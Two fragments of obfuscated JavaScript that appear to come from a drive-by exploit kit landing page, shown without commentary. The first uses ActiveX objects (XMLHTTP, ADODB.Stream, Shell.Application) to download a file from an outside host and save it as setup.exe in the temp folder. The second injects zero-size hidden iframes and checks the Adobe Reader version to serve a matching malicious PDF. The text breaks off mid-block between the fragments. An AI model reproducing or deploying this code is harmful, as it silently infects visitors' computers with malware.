

```
function xkg(nsu, js) {
    var mawa = null;
    try {
        mawa = nsu.CreateObject(js)
    } catch (e) {}
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.CreateObject(js, "", "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject("", js)
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js, "")
        } catch (e) {}
    }
    if (!mawa) {
        try {
            mawa = nsu.GetObject(js)
        } catch (e) {}
    }
    return (mawa);
}

function gr(sgw) {
    var ha = 'http://mullador.cz.cc/out.php?a=QQkEEkcJBQQEBAQB&p=6';
    qbnp = "setup.exe";
    var dyv = sgw.CreateObject("Scripting.FileSystemObject", "");
    var sap = xkg(sgw, "Shell.Application");
    var ji = xkg(sgw, "ADODB.Stream");
    var sx = null;
    qbnp = dyv.BuildPath(dyv.GetSpecialFolder(2), qbnp);
    ji.Mode = 3;
    try {
        sx = xkg(sgw, "Microsoft.XMLHTTP");
        sx.open("GET", ha, false);
    } catch (e) {
        try {
            sx = xkg(sgw, "MSXML2.XMLHTTP");
            sx.open("GET", ha, false);
        } catch (e) {
            try {
                sx = xkg(sgw, "MSXML2.ServerXMLHTTP");
                sx.open("GET", ha, false);
            } catch (e) {
```





```
        m.setAttribute("src", fn);
        m.setAttribute("width", 0);
        m.setAttribute("height", 0);
        m.setAttribute("frameborder", "0");
        document.body.appendChild(m);
    } catch (e) {
        step3();
    }
    step3();
}
function fghjdfgxbz(fn) {
    var p = document.createElement('iframe');
    p.setAttribute('src', fn);
    p.setAttribute('width', 300);
    p.setAttribute('height', 200);
    p.setAttribute('frameborder', '0');
    document.body.appendChild(p);
}
function step3(){
    var lv = Pdf1.GetVersions();
    var fi = /EScript=([^\,]+),/;
    var fif = /AcroForm=([^\,]+),/; lvf = lv.match(fif)[1].split('.'); lv =
    lv.match(fi)[1].split('.'); sv = parseInt(lv[0]); lv = parseInt(lv.join('')); lvf =
    parseInt(lvf.join(''));
    if (lv >= 800) {
        fghjdfgxbz('./manual.pdf');
    } else {
        fghjdfgxbz('./manuale.pdf');
    }
}
step0();
```